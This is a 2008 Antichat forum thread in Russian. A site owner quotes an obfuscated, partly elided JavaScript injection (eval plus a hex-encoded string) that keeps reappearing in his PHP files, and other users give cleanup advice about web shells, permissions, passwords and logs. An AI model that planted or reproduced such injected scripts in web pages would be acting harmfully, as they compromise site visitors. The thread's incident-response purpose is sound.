ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сломали (или заразили) сайт. Что это может быть?
  #1  
Старый 10.11.2008, 13:35
Аватар для p@tison
p@tison
Новичок
Регистрация: 03.11.2008
Сообщений: 11
Провел на форуме:
40034

Репутация: 1
По умолчанию Сломали (или заразили) сайт. Что это может быть?

Привет товарисчи кодеры и другие кибер-маньяки
Всплыла проблемка у меня с сайтом. начал находить периодически в некоторых фаилах сайта (.php) вот такую вот строчку:
Код:
<div id='x0d65a24088ed1686437f1ee911ceeb9a0'><script>var jQuery = eval('w%i^nyd^ohw%.^e^v%ahly'.replace(/[\^s%yh]/g, '')); 
jQuery('\x66\x75\x6e\x63\x74\x69......x25\x37\x31\x27\x29\x3b');</script></div>
Пароль на хосте меняли. Дыры вроде все позакрывали. Что-бы это могло быть и как могло заразить?
Заранее спасибо!
 
Ответить с цитированием

  #2  
Старый 10.11.2008, 13:58
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Менять пароль на хосте я бы стал менять в посленюю очередь .. сначал шеллы чтоль повыдерал бы ... да файлы протрояненые
 
Ответить с цитированием

  #3  
Старый 10.11.2008, 14:56
Аватар для p@tison
p@tison
Новичок
Регистрация: 03.11.2008
Сообщений: 11
Провел на форуме:
40034

Репутация: 1
По умолчанию

шеллы повыдерать - а это как, в двух словах?
фаилы протрояненые - т.е. файлы в которых был найден этот код? а просто удаление кода не спасёт что-ли?
 
Ответить с цитированием

  #4  
Старый 10.11.2008, 15:15
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Удли коды, поставь необходимые права на файлы, проверь комп на вирусы (и все админы пусть сделают тоже самое) и поменяй пароли на всё остальное (фтп...)
 
Ответить с цитированием

  #5  
Старый 10.11.2008, 15:16
Аватар для iSeoBot
iSeoBot
Участник форума
Регистрация: 11.04.2008
Сообщений: 279
Провел на форуме:
998892

Репутация: 217
По умолчанию

если олени ломали тебя,ищи файлы с недавним временем редактирования.которые ты не мог редачить в это время,их и копай! меня все пасы,живи щасливо
 
Ответить с цитированием

  #6  
Старый 10.11.2008, 15:31
Аватар для p@tison
p@tison
Новичок
Регистрация: 03.11.2008
Сообщений: 11
Провел на форуме:
40034

Репутация: 1
По умолчанию

Та код я удалял уже из фаилов. после чего закрыл дыры (найденые) и поменял пароль. Однако через какое-то время всё повторилось.
 
Ответить с цитированием

  #7  
Старый 10.11.2008, 16:21
Аватар для schut123
schut123
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме:
868377

Репутация: 99
По умолчанию


p@tison

Шелл поищи. Что такое шелл и как его искать => расширеный поиск
 
Ответить с цитированием

  #8  
Старый 10.11.2008, 16:27
Аватар для iSeoBot
iSeoBot
Участник форума
Регистрация: 11.04.2008
Сообщений: 279
Провел на форуме:
998892

Репутация: 217
По умолчанию

ищи файлы с недавним временем редактирования

могли сломать через хостера,возможно там стоит бажное ядро
 
Ответить с цитированием

  #9  
Старый 18.11.2008, 16:05
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

Была давно такая тема с сайтом. Если используешь Total Commander и ему подобные, то меняй пароль и не сохраняй его в проге... там все автоматом действует (етот вирус)
 
Ответить с цитированием

  #10  
Старый 21.11.2008, 10:02
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

а к логам доступа последнее время не предоставляют?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Основные Seo термины _-Ramos-_ SЕО - тонкости, методы раскрутки 8 21.04.2010 23:34
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
Что ломать? Almight Чаты 3 09.02.2004 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ